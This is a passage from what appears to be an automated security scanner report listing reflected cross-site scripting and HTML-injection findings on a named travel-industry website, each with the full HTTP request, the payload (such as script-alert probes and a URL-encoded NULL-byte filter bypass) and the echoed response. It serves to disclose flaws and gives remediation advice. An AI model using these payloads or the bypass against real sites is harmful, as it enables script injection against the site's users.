NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/travel_agency/contracts/?%00b86bc<a>3b3252b8864=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:05:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621930; expires=Tue, 02-Oct-2012 01:05:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:05:31 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>3b3252b8864=1">?%00b86bc<a>3b3252b8864=1</a>
...[SNIP]...
4.363. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de283"><script>alert(1)</script>166290c97fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /homede283"><script>alert(1)</script>166290c97fc/products_services/travel_agency/contracts/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:07:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622027; expires=Tue, 02-Oct-2012 01:07:07 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:07:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/homede283"><script>alert(1)</script>166290c97fc/products_services">
...[SNIP]...
4.364. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a210c<a>9c3419cad76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homea210c<a>9c3419cad76/products_services/travel_agency/contracts/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:07:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622035; expires=Tue, 02-Oct-2012 01:07:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:07:15 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13608


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>9c3419cad76">homea210c<a>9c3419cad76</a>
...[SNIP]...
4.365. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %008d8ab<a>d3ab6ad4db6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d8ab<a>d3ab6ad4db6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/travel_agency/contracts/images/loadingAnimation.gif?%008d8ab<a>d3ab6ad4db6=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:05:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621929; expires=Tue, 02-Oct-2012 01:05:29 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:05:30 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>d3ab6ad4db6=1">loadingAnimation.gif?%008d8ab<a>d3ab6ad4db6=1</a>
...[SNIP]...
4.366. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b96a6"><a>7f830de7a83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b96a6"><a>7f830de7a83 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/travel_agency/contracts/images/loadingAnimation.gif?%00b96a6"><a>7f830de7a83=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621878; expires=Tue, 02-Oct-2012 01:04:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:04:39 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/travel_agency/contracts/images/loadingAnimation.gif?%00b96a6"><a>7f830de7a83=1">
...[SNIP]...
4.367. http://www.sabretravelnetwork.com/home/search/show_results [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/search/show_results

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f73c4<a>d21c8301381 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homef73c4<a>d21c8301381/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621489; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621516; expires=Tue, 02-Oct-2012 00:58:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13427


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>d21c8301381">homef73c4<a>d21c8301381</a>
...[SNIP]...
4.368. http://www.sabretravelnetwork.com/home/search/show_results [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/search/show_results

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d87"><script>alert(1)</script>fb97ed1345c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home83d87"><script>alert(1)</script>fb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621489; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621516; expires=Tue, 02-Oct-2012 00:58:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13577


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87"><script>alert(1)</script>fb97ed1345c/search">
...[SNIP]...
4.369. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9041d<a>d45b727a2a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C9041d<a>d45b727a2a6/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621519; expires=Tue, 02-Oct-2012 00:58:39 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:39 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13379


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>d45b727a2a6">home55bd4%22%3E%3Cscript%3Ealert(1)%3C9041d<a>d45b727a2a6</a>
...[SNIP]...
4.370. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f18ac"><script>alert(1)</script>101846b9346 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac"><script>alert(1)</script>101846b9346/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621519; expires=Tue, 02-Oct-2012 00:58:39 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:39 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac"><script>alert(1)</script>101846b9346/images">
...[SNIP]...
4.371. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bee01<a>388ea328403 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/imagesbee01<a>388ea328403/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
